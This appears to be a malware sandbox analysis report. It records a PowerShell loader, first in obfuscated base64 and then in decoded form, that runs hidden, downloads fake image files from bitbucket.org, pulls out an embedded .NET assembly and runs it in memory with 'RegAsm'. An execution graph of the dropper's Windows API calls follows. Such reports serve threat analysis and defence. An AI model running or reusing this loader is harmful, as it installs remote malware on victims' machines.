                                                                                        Target ID:4
                                                                                        Start time:13:04:49
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:13:04:51
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:13:05:00
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                        Imagebase:0x7ff6b80e0000
                                                                                        File size:71'680 bytes
                                                                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:25%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:40.6%
                                                                                          Total number of Nodes:983
                                                                                          Total number of Limit Nodes:45
                                                                                          execution_graph 3133 7ff681c25aca 3134 7ff681c25a9e 3133->3134 3135 7ff681c25ad0 GlobalFree 3133->3135 3136 7ff681c2874b RtlCaptureContext RtlLookupFunctionEntry 3137 7ff681c287d7 3136->3137 3138 7ff681c28795 RtlVirtualUnwind 3136->3138 3141 7ff681c28714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3137->3141 3138->3137 3142 7ff681c27b0f 3143 7ff681c27b5d 3142->3143 3144 7ff681c27e08 CharPrevA 3143->3144 3145 7ff681c27b95 CreateFileA 3144->3145 3146 7ff681c27bde WriteFile 3145->3146 3147 7ff681c27bd0 3145->3147 3148 7ff681c27c02 CloseHandle 3146->3148 3150 7ff681c286f0 7 API calls 3147->3150 3148->3147 3151 7ff681c27c35 3150->3151 3152 7ff681c234ce 3153 7ff681c234eb CallWindowProcA 3152->3153 3154 7ff681c234dc 3152->3154 3155 7ff681c234e7 3153->3155 3154->3153 3154->3155 3156 7ff681c23a4e 3157 7ff681c23a73 3156->3157 3158 7ff681c23b49 3156->3158 3157->3158 3159 7ff681c23a88 3157->3159 3160 7ff681c23b51 GetDesktopWindow 3157->3160 3161 7ff681c23a94 3158->3161 3162 7ff681c23c5a EndDialog 3158->3162 3164 7ff681c23abb 3159->3164 3165 7ff681c23a8c 3159->3165 3178 7ff681c24dc8 6 API calls 3160->3178 3162->3161 3164->3161 3168 7ff681c23ac5 ResetEvent 3164->3168 3165->3161 3167 7ff681c23a9b TerminateThread 3165->3167 3167->3162 3171 7ff681c24f2c 24 API calls 3168->3171 3169 7ff681c23b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3170 7ff681c23bdb SetWindowTextA CreateThread 3169->3170 3170->3161 3172 7ff681c23c28 3170->3172 3173 7ff681c23b03 3171->3173 3174 7ff681c24f2c 24 API calls 3172->3174 3175 7ff681c23b24 SetEvent 3173->3175 3176 7ff681c23b0c SetEvent 3173->3176 3174->3158 3177 7ff681c23c80 4 API calls 3175->3177 3176->3161 3177->3158 3180 7ff681c24e9f SetWindowPos 3178->3180 3181 7ff681c286f0 7 API calls 3180->3181 3182 7ff681c23b6f 3181->3182 3182->3169 3182->3170 3183 7ff681c289ce 3184 7ff681c28a02 3183->3184 3186 7ff681c289df 3183->3186 3185 7ff681c289fb ?terminate@ 3185->3184 3186->3184 3186->3185 3187 7ff681c2868e 3188 7ff681c286a6 3187->3188 3189 7ff681c2869d _exit 3187->3189 3190 7ff681c286bb 3188->3190 3191 7ff681c286af _cexit 3188->3191 3189->3188 3191->3190 3119 7ff681c258d0 3126 7ff681c23c80 3119->3126 3122 7ff681c25902 WriteFile 3123 7ff681c25939 3122->3123 3124 7ff681c258fa 3122->3124 3123->3124 3125 7ff681c25965 SendDlgItemMessageA 3123->3125 3125->3124 3127 7ff681c23c8c MsgWaitForMultipleObjects 3126->3127 3128 7ff681c23d25 3127->3128 3129 7ff681c23cb4 PeekMessageA 3127->3129 3128->3122 3128->3124 3129->3127 3130 7ff681c23cd9 3129->3130 3130->3127 3130->3128 3131 7ff681c23ce7 DispatchMessageA 3130->3131 3132 7ff681c23cf8 PeekMessageA 3130->3132 3131->3132 3132->3130 3192 7ff681c24b3b SendMessageA 3193 7ff681c255ba 3194 7ff681c2557c 3193->3194 3195 7ff681c255be 3193->3195 3196 7ff681c2563d lstrcmpA 3195->3196 3197 7ff681c25610 3195->3197 3199 7ff681c25694 3196->3199 3200 7ff681c25634 3196->3200 3198 7ff681c24f2c 24 API calls 3197->3198 3198->3200 3199->3200 3201 7ff681c256e8 CreateFileA 3199->3201 3201->3200 3204 7ff681c2571e 3201->3204 3202 7ff681c257a1 CreateFileA 3202->3200 3203 7ff681c25789 CharNextA 3203->3204 3204->3200 3204->3202 3204->3203 3205 7ff681c25772 CreateDirectoryA 3204->3205 3205->3203 3206 7ff681c28400 __getmainargs 3207 7ff681c2397e 3208 7ff681c2399a 3207->3208 3209 7ff681c23992 3207->3209 3210 7ff681c23a2c EndDialog 3208->3210 3213 7ff681c2399f 3208->3213 3209->3208 3211 7ff681c239ce GetDesktopWindow 3209->3211 3210->3213 3212 7ff681c24dc8 14 API calls 3211->3212 3214 7ff681c239e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3212->3214 3214->3213 3215 7ff681c25f7e 3216 7ff681c251f8 7 API calls 3215->3216 3217 7ff681c25f9b FindResourceA LoadResource LockResource 3216->3217 3218 7ff681c25fec 3217->3218 3232 7ff681c261bf 3217->3232 3219 7ff681c26046 3218->3219 3220 7ff681c25ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3218->3220 3221 7ff681c25e44 33 API calls 3219->3221 3220->3219 3222 7ff681c2604b 3221->3222 3223 7ff681c26059 #20 3222->3223 3224 7ff681c2604f 3222->3224 3223->3224 3225 7ff681c260c1 #22 3223->3225 3226 7ff681c24f2c 24 API calls 3224->3226 3227 7ff681c26143 3225->3227 3228 7ff681c26105 #23 3225->3228 3226->3227 3229 7ff681c26151 FreeResource 3227->3229 3230 7ff681c26165 3227->3230 3228->3224 3228->3227 3229->3230 3231 7ff681c2618f 3230->3231 3233 7ff681c24f2c 24 API calls 3230->3233 3231->3232 3234 7ff681c261a1 SendMessageA 3231->3234 3233->3231 3234->3232 3235 7ff681c28df0 _XcptFilter 3236 7ff681c25aae GlobalAlloc 3237 7ff681c2146e 3238 7ff681c214c7 GetDesktopWindow 3237->3238 3239 7ff681c214a0 3237->3239 3240 7ff681c24dc8 14 API calls 3238->3240 3241 7ff681c214c3 3239->3241 3243 7ff681c214b2 EndDialog 3239->3243 3242 7ff681c214de LoadStringA SetDlgItemTextA MessageBeep 3240->3242 3244 7ff681c286f0 7 API calls 3241->3244 3242->3241 3243->3241 3245 7ff681c21540 3244->3245 3246 7ff681c2366e 3247 7ff681c23697 3246->3247 3248 7ff681c23946 EndDialog 3246->3248 3249 7ff681c236a7 3247->3249 3250 7ff681c238c2 GetDesktopWindow 3247->3250 3251 7ff681c236ab 3248->3251 3249->3251 3253 7ff681c236bb 3249->3253 3254 7ff681c23775 GetDlgItemTextA 3249->3254 3252 7ff681c24dc8 14 API calls 3250->3252 3255 7ff681c238d9 SetWindowTextA SendDlgItemMessageA 3252->3255 3257 7ff681c23758 EndDialog 3253->3257 3258 7ff681c236c4 3253->3258 3256 7ff681c2379e 3254->3256 3279 7ff681c23829 3254->3279 3255->3251 3259 7ff681c2391c GetDlgItem EnableWindow 3255->3259 3266 7ff681c237d4 GetFileAttributesA 3256->3266 3256->3279 3257->3251 3258->3251 3260 7ff681c236d1 LoadStringA 3258->3260 3259->3251 3261 7ff681c2371e 3260->3261 3273 7ff681c236fd 3260->3273 3283 7ff681c24b70 LoadLibraryA 3261->3283 3263 7ff681c24f2c 24 API calls 3263->3251 3264 7ff681c24f2c 24 API calls 3282 7ff681c23717 3264->3282 3267 7ff681c237e8 3266->3267 3268 7ff681c2383a 3266->3268 3270 7ff681c24f2c 24 API calls 3267->3270 3272 7ff681c27e08 CharPrevA 3268->3272 3269 7ff681c2372b SetDlgItemTextA 3269->3251 3269->3273 3274 7ff681c2380b 3270->3274 3271 7ff681c2388f EndDialog 3271->3251 3275 7ff681c2384e 3272->3275 3273->3264 3274->3251 3276 7ff681c23814 CreateDirectoryA 3274->3276 3277 7ff681c26d9c 31 API calls 3275->3277 3276->3268 3276->3279 3278 7ff681c23856 3277->3278 3278->3279 3280 7ff681c23861 3278->3280 3279->3263 3281 7ff681c26f14 38 API calls 3280->3281 3281->3282 3282->3251 3282->3271 3284 7ff681c24d7f 3283->3284 3285 7ff681c24bb4 GetProcAddress 3283->3285 3289 7ff681c24f2c 24 API calls 3284->3289 3286 7ff681c24bd6 GetProcAddress 3285->3286 3287 7ff681c24d69 FreeLibrary 3285->3287 3286->3287 3288 7ff681c24bfb GetProcAddress 3286->3288 3287->3284 3288->3287 3290 7ff681c24c1d 3288->3290 3291 7ff681c23723 3289->3291 3292 7ff681c24c31 GetTempPathA 3290->3292 3297 7ff681c24c7f FreeLibrary 3290->3297 3291->3251 3291->3269 3293 7ff681c24c46 3292->3293 3293->3293 3294 7ff681c24c4e CharPrevA 3293->3294 3295 7ff681c24c68 CharPrevA 3294->3295 3294->3297 3295->3297 3297->3291 3078 7ff681c25af1 3079 7ff681c25b3c 3078->3079 3080 7ff681c25b25 3078->3080 3083 7ff681c25c36 3079->3083 3085 7ff681c25b33 3079->3085 3087 7ff681c25b52 3079->3087 3081 7ff681c259b0 CloseHandle 3080->3081 3080->3085 3081->3085 3082 7ff681c286f0 7 API calls 3084 7ff681c25cdb 3082->3084 3086 7ff681c25c42 SetDlgItemTextA 3083->3086 3088 7ff681c25c57 3083->3088 3085->3082 3086->3088 3087->3085 3089 7ff681c25b93 DosDateTimeToFileTime 3087->3089 3088->3085 3103 7ff681c253b8 GetFileAttributesA 3088->3103 3089->3085 3091 7ff681c25bb0 LocalFileTimeToFileTime 3089->3091 3091->3085 3093 7ff681c25bce SetFileTime 3091->3093 3093->3085 3094 7ff681c25bf6 3093->3094 3096 7ff681c259b0 CloseHandle 3094->3096 3095 7ff681c255c0 29 API calls 3097 7ff681c25c9b 3095->3097 3098 7ff681c25bff SetFileAttributesA 3096->3098 3097->3085 3099 7ff681c25ca8 3097->3099 3098->3085 3110 7ff681c25478 LocalAlloc 3099->3110 3104 7ff681c253da 3103->3104 3105 7ff681c2545b 3103->3105 3104->3105 3106 7ff681c25442 SetFileAttributesA 3104->3106 3107 7ff681c27d28 28 API calls 3104->3107 3105->3085 3105->3095 3106->3105 3108 7ff681c25424 3107->3108 3108->3105 3108->3106 3109 7ff681c25438 3108->3109 3109->3106 3111 7ff681c254a6 3110->3111 3112 7ff681c254d0 LocalAlloc 3110->3112 3113 7ff681c24f2c 24 API calls 3111->3113 3115 7ff681c254ff 3112->3115 3118 7ff681c254c9 3112->3118 3113->3118 3116 7ff681c24f2c 24 API calls 3115->3116 3117 7ff681c25522 LocalFree 3116->3117 3117->3118 3118->3085 2235 7ff681c28460 2254 7ff681c28bf4 2235->2254 2239 7ff681c284ab 2240 7ff681c284bd 2239->2240 2242 7ff681c284da Sleep 2239->2242 2241 7ff681c284cd _amsg_exit 2240->2241 2245 7ff681c284e7 2240->2245 2241->2245 2242->2239 2243 7ff681c28569 _initterm 2247 7ff681c28586 _IsNonwritableInCurrentImage 2243->2247 2244 7ff681c2854a 2245->2243 2245->2244 2245->2247 2246 7ff681c2866f _ismbblead 2246->2247 2247->2244 2247->2246 2248 7ff681c285f4 2247->2248 2258 7ff681c22d70 GetVersion 2248->2258 2251 7ff681c28646 2251->2244 2253 7ff681c2864f _cexit 2251->2253 2252 7ff681c2863e exit 2252->2251 2253->2244 2255 7ff681c28c20 6 API calls 2254->2255 2256 7ff681c28469 GetStartupInfoW 2254->2256 2257 7ff681c28c9f 2255->2257 2256->2239 2257->2256 2259 7ff681c22d97 2258->2259 2260 7ff681c22de9 2258->2260 2259->2260 2261 7ff681c22d9b GetModuleHandleW 2259->2261 2282 7ff681c22edc 2260->2282 2261->2260 2263 7ff681c22db3 GetProcAddress 2261->2263 2263->2260 2264 7ff681c22dce 2263->2264 2264->2260 2266 7ff681c22ea5 2268 7ff681c22ebd 2266->2268 2269 7ff681c22eb1 CloseHandle 2266->2269 2268->2251 2268->2252 2269->2268 2273 7ff681c22e4f 2273->2266 2274 7ff681c22e59 2273->2274 2275 7ff681c22e84 2273->2275 2398 7ff681c24f2c 2274->2398 2278 7ff681c22e8d ExitWindowsEx 2275->2278 2279 7ff681c22ea0 2275->2279 2278->2266 2427 7ff681c21bf4 GetCurrentProcess OpenProcessToken 2279->2427 2283 7ff681c28da9 2282->2283 2284 7ff681c22f21 memset memset 2283->2284 2435 7ff681c251f8 FindResourceA SizeofResource 2284->2435 2287 7ff681c22f7b CreateEventA SetEvent 2289 7ff681c251f8 7 API calls 2287->2289 2288 7ff681c230dd 2291 7ff681c24f2c 24 API calls 2288->2291 2290 7ff681c22fba 2289->2290 2292 7ff681c22fbe 2290->2292 2294 7ff681c22ffd 2290->2294 2297 7ff681c230cb 2290->2297 2293 7ff681c23101 2291->2293 2295 7ff681c24f2c 24 API calls 2292->2295 2467 7ff681c286f0 2293->2467 2298 7ff681c251f8 7 API calls 2294->2298 2300 7ff681c22fdc 2295->2300 2440 7ff681c27320 2297->2440 2299 7ff681c23014 2298->2299 2299->2292 2303 7ff681c23026 CreateMutexA 2299->2303 2300->2293 2303->2297 2305 7ff681c2304a GetLastError 2303->2305 2305->2297 2309 7ff681c2305d 2305->2309 2306 7ff681c230ec 2307 7ff681c23106 FindResourceExA 2306->2307 2308 7ff681c230f5 2306->2308 2311 7ff681c23127 LoadResource 2307->2311 2312 7ff681c2313c 2307->2312 2475 7ff681c22034 2308->2475 2313 7ff681c2308a 2309->2313 2314 7ff681c23072 2309->2314 2311->2312 2316 7ff681c23151 2312->2316 2317 7ff681c23145 #17 2312->2317 2318 7ff681c24f2c 24 API calls 2313->2318 2315 7ff681c24f2c 24 API calls 2314->2315 2319 7ff681c23088 2315->2319 2316->2293 2320 7ff681c23162 2316->2320 2317->2316 2321 7ff681c230a4 2318->2321 2322 7ff681c230a9 CloseHandle 2319->2322 2490 7ff681c23d34 GetVersionExA 2320->2490 2321->2297 2321->2322 2322->2293 2328 7ff681c23214 2329 7ff681c23269 2328->2329 2330 7ff681c2323e 2328->2330 2627 7ff681c261d4 2329->2627 2331 7ff681c2325c 2330->2331 2607 7ff681c26294 2330->2607 2786 7ff681c24064 2331->2786 2338 7ff681c23368 2341 7ff681c286f0 7 API calls 2338->2341 2343 7ff681c22e07 2341->2343 2342 7ff681c23283 GetSystemDirectoryA 2344 7ff681c27e08 CharPrevA 2342->2344 2374 7ff681c263dc 2343->2374 2345 7ff681c232ae LoadLibraryA 2344->2345 2346 7ff681c232c7 GetProcAddress 2345->2346 2347 7ff681c232fb FreeLibrary 2345->2347 2346->2347 2348 7ff681c232e2 DecryptFileA 2346->2348 2349 7ff681c23316 2347->2349 2350 7ff681c233a5 SetCurrentDirectoryA 2347->2350 2348->2347 2349->2350 2352 7ff681c23322 GetWindowsDirectoryA 2349->2352 2351 7ff681c2333f 2350->2351 2358 7ff681c233c3 2350->2358 2356 7ff681c24f2c 24 API calls 2351->2356 2352->2351 2354 7ff681c2338c 2352->2354 2353 7ff681c23451 2353->2338 2360 7ff681c223c0 19 API calls 2353->2360 2367 7ff681c23479 2353->2367 2690 7ff681c26f14 2354->2690 2359 7ff681c2335d 2356->2359 2358->2353 2361 7ff681c2342d 2358->2361 2364 7ff681c233fd 2358->2364 2805 7ff681c27958 GetLastError 2359->2805 2360->2367 2718 7ff681c25f80 2361->2718 2363 7ff681c2349a 2363->2338 2368 7ff681c234b5 2363->2368 2369 7ff681c27d28 28 API calls 2364->2369 2365 7ff681c23362 2365->2338 2367->2363 2740 7ff681c241b4 2367->2740 2816 7ff681c24a54 2368->2816 2370 7ff681c23428 2369->2370 2370->2338 2806 7ff681c27984 2370->2806 2375 7ff681c26404 2374->2375 2376 7ff681c2643c LocalFree LocalFree 2375->2376 2377 7ff681c26419 SetFileAttributesA DeleteFileA 2375->2377 2384 7ff681c26463 2375->2384 2376->2375 2377->2376 2378 7ff681c26577 2380 7ff681c286f0 7 API calls 2378->2380 2379 7ff681c26501 2379->2378 2381 7ff681c2651d RegOpenKeyExA 2379->2381 2382 7ff681c22e0e 2380->2382 2381->2378 2383 7ff681c2654e RegDeleteValueA RegCloseKey 2381->2383 2382->2266 2382->2273 2388 7ff681c223c0 2382->2388 2383->2378 2384->2379 2385 7ff681c264e4 SetCurrentDirectoryA 2384->2385 2386 7ff681c27ea0 4 API calls 2384->2386 2387 7ff681c22034 16 API calls 2385->2387 2386->2385 2387->2379 2389 7ff681c22478 2388->2389 2390 7ff681c223d1 2388->2390 3070 7ff681c22234 GetWindowsDirectoryA 2389->3070 2392 7ff681c22471 2390->2392 2395 7ff681c223db 2390->2395 3067 7ff681c22308 RegOpenKeyExA 2392->3067 2394 7ff681c2246b 2394->2273 2395->2394 2396 7ff681c223eb RegOpenKeyExA 2395->2396 2396->2394 2397 7ff681c22420 RegQueryValueExA RegCloseKey 2396->2397 2397->2394 2399 7ff681c25105 2398->2399 2400 7ff681c24fa5 LoadStringA 2398->2400 2405 7ff681c286f0 7 API calls 2399->2405 2401 7ff681c24fcf 2400->2401 2402 7ff681c25011 2400->2402 2403 7ff681c28154 13 API calls 2401->2403 2404 7ff681c2508d 2402->2404 2413 7ff681c2501d LocalAlloc 2402->2413 2407 7ff681c24fd4 2403->2407 2410 7ff681c250e6 LocalAlloc 2404->2410 2411 7ff681c250a0 LocalAlloc 2404->2411 2406 7ff681c22e7f 2405->2406 2406->2266 2406->2275 2408 7ff681c24fdd MessageBoxA 2407->2408 2409 7ff681c28084 2 API calls 2407->2409 2408->2399 2409->2408 2410->2399 2422 7ff681c25088 MessageBeep 2410->2422 2411->2399 2417 7ff681c250d1 2411->2417 2413->2399 2418 7ff681c25070 2413->2418 2421 7ff681c210bc _vsnprintf 2417->2421 2419 7ff681c210bc _vsnprintf 2418->2419 2419->2422 2420 7ff681c28154 13 API calls 2423 7ff681c25173 2420->2423 2421->2422 2422->2420 2424 7ff681c2517c MessageBoxA LocalFree 2423->2424 2425 7ff681c28084 2 API calls 2423->2425 2424->2399 2425->2424 2428 7ff681c21c57 LookupPrivilegeValueA 